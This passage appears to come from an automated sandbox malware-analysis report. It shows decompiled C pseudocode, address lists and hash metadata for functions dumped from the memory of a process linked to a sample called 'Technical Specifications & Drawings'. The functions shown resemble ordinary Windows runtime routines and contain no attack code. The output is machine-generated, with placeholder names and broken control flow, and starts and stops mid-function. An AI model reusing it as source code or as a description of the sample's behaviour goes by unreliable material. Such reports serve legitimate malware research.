						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E017FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E017EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                  0x017ab171
                                                  0x017ab171
                                                  0x017ab171
                                                  0x017ab171
                                                  0x017ab171
                                                  0x017ab176
                                                  0x017ab17b
                                                  0x017ab180
                                                  0x017ab186
                                                  0x017ab18f
                                                  0x017ab198
                                                  0x017ab1a4
                                                  0x017ab1aa
                                                  0x01804802
                                                  0x01804802
                                                  0x01804805
                                                  0x0180480c
                                                  0x0180480e
                                                  0x017ab1d1
                                                  0x017ab1d3
                                                  0x017ab1de
                                                  0x017ab1de
                                                  0x01804817
                                                  0x0180481e
                                                  0x01804820
                                                  0x01804822
                                                  0x01804822
                                                  0x01804824
                                                  0x01804824
                                                  0x0180482a
                                                  0x00000000
                                                  0x00000000
                                                  0x01804835
                                                  0x0180483a
                                                  0x0180483d
                                                  0x0180483f
                                                  0x01804842
                                                  0x01804842
                                                  0x01804842
                                                  0x01804846
                                                  0x0180484c
                                                  0x0180484e
                                                  0x01804851
                                                  0x01804851
                                                  0x01804853
                                                  0x01804854
                                                  0x01804854
                                                  0x01804858
                                                  0x0180485a
                                                  0x0180485a
                                                  0x0180485d
                                                  0x0180485f
                                                  0x01804861
                                                  0x01804861
                                                  0x01804866
                                                  0x0180486b
                                                  0x0180486e
                                                  0x01804871
                                                  0x01804876
                                                  0x01804876
                                                  0x01804878
                                                  0x0180487b
                                                  0x01804884
                                                  0x01804884
                                                  0x00000000
                                                  0x0180487d
                                                  0x0180487d
                                                  0x01804882
                                                  0x01804889
                                                  0x01804889
                                                  0x0180488f
                                                  0x01804891
                                                  0x018048e0
                                                  0x018048e2
                                                  0x018048e4
                                                  0x018048e4
                                                  0x018048e7
                                                  0x018048e7
                                                  0x018048ed
                                                  0x018048f4
                                                  0x018048f6
                                                  0x01804951
                                                  0x01804951
                                                  0x01804953
                                                  0x01804953
                                                  0x01804956
                                                  0x01804956
                                                  0x01804958
                                                  0x01804959
                                                  0x01804959
                                                  0x0180495d
                                                  0x0180495d
                                                  0x0180495f
                                                  0x0180495f
                                                  0x01804965
                                                  0x01804969
                                                  0x018049ba
                                                  0x018049ba
                                                  0x018049c1
                                                  0x018049c5
                                                  0x018049cc
                                                  0x018049d4
                                                  0x018049d7
                                                  0x018049da
                                                  0x018049e4
                                                  0x018049e5
                                                  0x018049f3
                                                  0x01804a02
                                                  0x00000000
                                                  0x01804a02
                                                  0x01804972
                                                  0x01804974
                                                  0x00000000
                                                  0x00000000
                                                  0x01804976
                                                  0x01804979
                                                  0x01804982
                                                  0x01804983
                                                  0x01804984
                                                  0x0180498b
                                                  0x0180498d
                                                  0x01804991
                                                  0x01804993
                                                  0x01804999
                                                  0x0180499d
                                                  0x018049a2
                                                  0x018049a2
                                                  0x018049a2
                                                  0x01804999
                                                  0x018049ac
                                                  0x00000000
                                                  0x018049b3
                                                  0x018048f8
                                                  0x018048fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018048fe
                                                  0x01804895
                                                  0x0180489c
                                                  0x018048ad
                                                  0x018048b2
                                                  0x018048b5
                                                  0x018048b7
                                                  0x018048ba
                                                  0x018048bc
                                                  0x018048c6
                                                  0x018048c6
                                                  0x018048cb
                                                  0x018048d1
                                                  0x018048d4
                                                  0x018048d8
                                                  0x018048d8
                                                  0x00000000
                                                  0x018048d8
                                                  0x018048be
                                                  0x018048c0
                                                  0x00000000
                                                  0x00000000
                                                  0x018048c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018048c4
                                                  0x00000000
                                                  0x01804882
                                                  0x0180487b
                                                  0x01804904
                                                  0x01804906
                                                  0x00000000
                                                  0x00000000
                                                  0x01804908
                                                  0x0180490e
                                                  0x00000000
                                                  0x00000000
                                                  0x01804910
                                                  0x01804917
                                                  0x01804917
                                                  0x00000000
                                                  0x01804917
                                                  0x017ab1ba
                                                  0x018047f9
                                                  0x018047fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018047fc
                                                  0x017ab1c0
                                                  0x017ab1c0
                                                  0x017ab1c3
                                                  0x017ab1cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: _vswprintf_s
                                                  • String ID:
                                                  • API String ID: 677850445-0
                                                  • Opcode ID: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                  • Instruction ID: 25060e9ac64df629ebf20698cc18166f1deed9572cf93f5f950a90f14740818d
                                                  • Opcode Fuzzy Hash: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                  • Instruction Fuzzy Hash: 5451D071D4025E8EEB72CF68C848BAEBBF0AF04710F1041ADDA59EB292D7704A41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E017CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x189d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E017C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01878CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E017E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E017EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E017ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E017C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01878F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E017EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1898628; // 0x0
								_v68 = _t77;
								_t78 =  *0x189862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1898628; // 0x0
							_t116 =  *0x189862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                  0x017cb94c
                                                  0x017cb956
                                                  0x017cb95c
                                                  0x017cb95e
                                                  0x017cb964
                                                  0x017cb969
                                                  0x017cb96d
                                                  0x017cb96d
                                                  0x017cb970
                                                  0x017cb974
                                                  0x017cb97a
                                                  0x017cbadf
                                                  0x017cbadf
                                                  0x017cbae2
                                                  0x017cbae4
                                                  0x017cbae6
                                                  0x017cbaf0
                                                  0x01812cb8
                                                  0x017cbaf6
                                                  0x017cbaf6
                                                  0x017cbaf6
                                                  0x017cbafd
                                                  0x017cbb1f
                                                  0x017cbb1f
                                                  0x017cbaff
                                                  0x017cbb00
                                                  0x017cbb00
                                                  0x017cbb03
                                                  0x017cbb03
                                                  0x017cbacb
                                                  0x017cbacf
                                                  0x017cbad0
                                                  0x017cbad1
                                                  0x017cbadc
                                                  0x017cbadc
                                                  0x017cb980
                                                  0x017cb980
                                                  0x017cb988
                                                  0x017cb98b
                                                  0x017cb98d
                                                  0x017cb990
                                                  0x017cb993
                                                  0x017cb999
                                                  0x017cb99b
                                                  0x017cb9a1
                                                  0x017cb9a5
                                                  0x017cb9aa
                                                  0x017cb9b0
                                                  0x017cb9bb
                                                  0x017cb9c0
                                                  0x017cb9c3
                                                  0x017cb9ca
                                                  0x017cb9cc
                                                  0x017cb9cf
                                                  0x017cb9d3
                                                  0x017cb9d7
                                                  0x017cba94
                                                  0x017cba94
                                                  0x017cba98
                                                  0x017cbaa3
                                                  0x01812ccb
                                                  0x017cbaa9
                                                  0x017cbaa9
                                                  0x017cbaa9
                                                  0x017cbab1
                                                  0x01812cd5
                                                  0x01812cdd
                                                  0x01812cdd
                                                  0x017cbabb
                                                  0x017cbabc
                                                  0x017cbac2
                                                  0x017cbac3
                                                  0x017cbac3
                                                  0x017cbac6
                                                  0x00000000
                                                  0x017cb9dd
                                                  0x017cb9dd
                                                  0x017cb9e7
                                                  0x017cb9e7
                                                  0x017cb9ec
                                                  0x017cb9ec
                                                  0x017cb9f1
                                                  0x017cb9f5
                                                  0x017cb9fa
                                                  0x017cba00
                                                  0x017cba0c
                                                  0x017cba10
                                                  0x017cba10
                                                  0x017cba12
                                                  0x017cba18
                                                  0x00000000
                                                  0x00000000
                                                  0x017cbb26
                                                  0x017cbb26
                                                  0x017cba1e
                                                  0x017cba1e
                                                  0x017cba23
                                                  0x017cba25
                                                  0x017cba2c
                                                  0x017cba30
                                                  0x017cba35
                                                  0x017cba35
                                                  0x017cba41
                                                  0x017cba46
                                                  0x017cba4c
                                                  0x017cba50
                                                  0x017cba54
                                                  0x017cba6a
                                                  0x017cba6e
                                                  0x017cba70
                                                  0x017cba74
                                                  0x017cba78
                                                  0x017cba7a
                                                  0x017cba7c
                                                  0x017cba8e
                                                  0x017cba90
                                                  0x017cba92
                                                  0x017cbb14
                                                  0x017cbb14
                                                  0x017cbb16
                                                  0x017cbb16
                                                  0x00000000
                                                  0x017cba7c
                                                  0x017cbb0a
                                                  0x017cbb0d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017cbb0f

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CB9A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 885266447-0
                                                  • Opcode ID: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                  • Instruction ID: 82276dbc8678de53a6751d2a5ac1d66376faf43d2dbcdd838b4dcdf83728a3cd
                                                  • Opcode Fuzzy Hash: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                  • Instruction Fuzzy Hash: 42514671A08341CFC721CF6DC48592AFBE5BB89B80F14896EFA8587359D731E944CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01853D40 Relevance: 1.6, APIs: 1, Instructions: 98timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E01853D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x189d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E017C2280(_t34, 0x1898a6c);
				_t64 =  *0x1895768; // 0x77575768
				if(_t64 != 0x1895768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E017BFFB0(_t53, _t64, 0x1898a6c);
						 *0x189b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E017C2280(_t45, 0x1898a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1895768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E017BFFB0(_t51, _t64, 0x1898a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E017EB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                  0x01853d40
                                                  0x01853d48
                                                  0x01853d52
                                                  0x01853d59
                                                  0x01853d5d
                                                  0x01853d61
                                                  0x01853d63
                                                  0x01853d67
                                                  0x01853d69
                                                  0x01853d72
                                                  0x01853d76
                                                  0x01853d7a
                                                  0x01853d7f
                                                  0x01853d8b
                                                  0x01853d91
                                                  0x01853d91
                                                  0x01853d91
                                                  0x01853d94
                                                  0x01853d96
                                                  0x01853d9d
                                                  0x01853da1
                                                  0x01853db0
                                                  0x01853dba
                                                  0x01853dbc
                                                  0x01853dbc
                                                  0x01853dc6
                                                  0x01853dcb
                                                  0x01853dcf
                                                  0x01853dd1
                                                  0x01853dd4
                                                  0x00000000
                                                  0x00000000
                                                  0x01853dd9
                                                  0x01853e0c
                                                  0x01853e0c
                                                  0x01853e0f
                                                  0x01853ddb
                                                  0x01853ddb
                                                  0x01853de0
                                                  0x00000000
                                                  0x01853de2
                                                  0x01853de2
                                                  0x01853de4
                                                  0x01853de8
                                                  0x01853deb
                                                  0x01853df1
                                                  0x00000000
                                                  0x01853df3
                                                  0x01853df3
                                                  0x01853df5
                                                  0x01853df8
                                                  0x01853dfa
                                                  0x00000000
                                                  0x01853dfa
                                                  0x01853df1
                                                  0x01853de0
                                                  0x01853e11
                                                  0x01853e11
                                                  0x00000000
                                                  0x01853dfe
                                                  0x01853e04
                                                  0x01853e06
                                                  0x00000000
                                                  0x01853e06
                                                  0x00000000
                                                  0x01853e04
                                                  0x01853d91
                                                  0x01853e15
                                                  0x01853e1a
                                                  0x01853e1f
                                                  0x01853e1f
                                                  0x01853e23
                                                  0x01853e29
                                                  0x00000000
                                                  0x00000000
                                                  0x01853e2e
                                                  0x00000000
                                                  0x01853e30
                                                  0x01853e30
                                                  0x01853e35
                                                  0x00000000
                                                  0x01853e37
                                                  0x01853e3e
                                                  0x01853e42
                                                  0x01853e48
                                                  0x01853e4e
                                                  0x00000000
                                                  0x01853e4e
                                                  0x01853e35
                                                  0x00000000
                                                  0x01853e2e
                                                  0x01853e5b
                                                  0x01853e5c
                                                  0x01853e5d
                                                  0x01853e68
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 98dfa5516a86d40a291aa75255176b22bd55a12ea3c945577152203203363c57
                                                  • Instruction ID: 3126015a77a7bb3d8b888af54a9400f3502a7f696820e25c1945ea9bc13cf43d
                                                  • Opcode Fuzzy Hash: 98dfa5516a86d40a291aa75255176b22bd55a12ea3c945577152203203363c57
                                                  • Instruction Fuzzy Hash: 833197B1609302DFCB11DF18C98491ABBE1FF86744F08496EF888DB645D734EA04CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E4A2C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E017E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x189d360 ^ _t62;
				_v8 =  *0x189d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E017C2280(_t26, 0x1898608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E017BFFB0(_t41, _t51, 0x1898608);
						L2:
						 *0x189b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E017EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E017C2280(_t28, 0x1898608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E017BFFB0(_t42, _t53, 0x1898608);
							if(_t53 != 0) {
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E017BFFB0(_t41, _t51, 0x1898608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                  0x017e4a2c
                                                  0x017e4a34
                                                  0x017e4a3c
                                                  0x017e4a3e
                                                  0x017e4a48
                                                  0x017e4a4b
                                                  0x017e4a4d
                                                  0x017e4a51
                                                  0x017e4a9c
                                                  0x00000000
                                                  0x00000000
                                                  0x017e4aa3
                                                  0x017e4aa8
                                                  0x017e4aad
                                                  0x017e4ab1
                                                  0x017e4ade
                                                  0x017e4ae3
                                                  0x017e4a5a
                                                  0x017e4a62
                                                  0x017e4a6a
                                                  0x017e4a6e
                                                  0x0181f203
                                                  0x017e4a84
                                                  0x017e4a88
                                                  0x017e4a89
                                                  0x017e4a8a
                                                  0x017e4a95
                                                  0x017e4a95
                                                  0x017e4a79
                                                  0x017e4a80
                                                  0x017e4af2
                                                  0x017e4af4
                                                  0x017e4af9
                                                  0x017e4aff
                                                  0x017e4b01
                                                  0x017e4b03
                                                  0x017e4b08
                                                  0x0181f20a
                                                  0x0181f212
                                                  0x0181f216
                                                  0x0181f216
                                                  0x017e4b08
                                                  0x017e4b13
                                                  0x017e4b1a
                                                  0x0181f229
                                                  0x0181f229
                                                  0x017e4b1a
                                                  0x017e4a82
                                                  0x00000000
                                                  0x017e4a82
                                                  0x017e4ab7
                                                  0x017e4acd
                                                  0x017e4acd
                                                  0x017e4ad5
                                                  0x017e4ada
                                                  0x00000000
                                                  0x017e4ada
                                                  0x017e4ac2
                                                  0x017e4acb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017e4acb
                                                  0x017e4a53
                                                  0x017e4a53
                                                  0x017e4a58
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
